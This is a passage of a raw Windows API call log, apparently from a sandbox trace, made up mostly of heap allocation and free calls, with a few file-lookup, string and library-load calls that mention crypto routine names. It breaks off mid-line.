[0255.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0255.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ee8 [0255.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0255.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0255.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0255.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51220 [0255.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0255.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0255.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0255.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0255.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0255.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0255.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0255.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546e8 [0255.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0255.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0255.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0255.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55dc0 [0255.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0255.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0255.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54738 [0255.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0255.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0255.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0255.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546c0 [0255.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0255.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0255.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54710 [0255.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0255.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0255.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0255.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0255.552] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0255.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0255.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0255.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0255.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0255.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0255.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54760 [0255.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0255.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0255.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0255.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0255.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0255.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54620 [0255.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0255.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0255.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0255.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0255.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54648 [0255.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0255.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0255.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0255.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545d0 [0255.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0255.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0255.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54620 | out: hHeap=0x970000) returned 1 [0255.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0255.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0255.552] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0255.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0255.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0255.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0255.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0255.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0255.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545f8 [0255.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0255.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0255.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0255.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0255.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0255.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0255.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0255.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0255.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0255.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0255.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0255.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0255.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0255.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54788 [0255.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0255.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0255.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0255.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0255.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0255.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0255.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0255.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0255.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0255.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0255.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0255.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0255.554] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0255.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0255.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0255.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0255.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547b0 [0255.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0255.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0255.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0255.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54670 [0255.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0255.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0255.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0255.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54698 [0255.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0255.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0255.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547b0 | out: hHeap=0x970000) returned 1 [0255.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0255.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0255.554] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0255.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0255.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0255.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0255.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547b0 [0255.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0255.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0255.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0255.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547d8 [0255.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0255.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0255.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0255.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54800 [0255.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0255.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0255.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0255.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0255.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0255.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0255.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0255.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0255.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0255.555] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/thpKc0ZlnbdGnIRJzL.gif", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x347e7710, ftCreationTime.dwHighDateTime=0x1d5ef90, ftLastAccessTime.dwLowDateTime=0x6cb0f210, ftLastAccessTime.dwHighDateTime=0x1d5f03b, ftLastWriteTime.dwLowDateTime=0x6cb0f210, ftLastWriteTime.dwHighDateTime=0x1d5f03b, nFileSizeHigh=0x0, nFileSizeLow=0xc6f1, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="thpKc0ZlnbdGnIRJzL.gif", cAlternateFileName="THPKC0~1.GIF")) returned 0xa87110 [0255.555] FindClose (in: hFindFile=0xa87110 | out: hFindFile=0xa87110) returned 1 [0255.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0255.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0255.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0255.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0255.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0255.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0255.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0255.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547b0 | out: hHeap=0x970000) returned 1 [0255.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0255.556] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0255.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0255.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0255.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0255.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0255.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0255.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545a8 [0255.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0255.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0255.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0255.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0255.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0255.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0255.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0255.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0255.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0255.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0255.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0255.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0255.557] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0255.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547b0 [0255.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0255.557] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0255.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547b0 | out: hHeap=0x970000) returned 1 [0255.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0255.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514a8 [0255.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0255.557] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0255.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0255.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e559d0 [0255.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0255.558] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0255.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e559d0 | out: hHeap=0x970000) returned 1 [0255.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0255.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514f0 [0255.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0255.559] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0255.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0255.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0255.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0255.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0255.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0255.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0255.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0255.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0255.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0255.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0255.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0255.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0255.559] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0255.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0255.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0255.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0255.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54620 [0255.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0255.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0255.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0255.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547b0 [0255.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0255.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0255.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0255.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54828 [0255.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0255.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0255.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0255.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0255.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0255.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0255.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0255.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0255.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0255.654] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0255.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0255.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0255.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0255.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0255.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0255.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0255.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0255.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54620 | out: hHeap=0x970000) returned 1 [0255.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0255.654] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0255.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0255.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0255.655] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0255.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c70 [0255.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0255.655] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0255.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c70 | out: hHeap=0x970000) returned 1 [0255.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0255.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0255.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54db8 [0255.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0255.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0255.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0255.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0255.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513a0 [0255.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54580 [0255.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0255.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0255.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 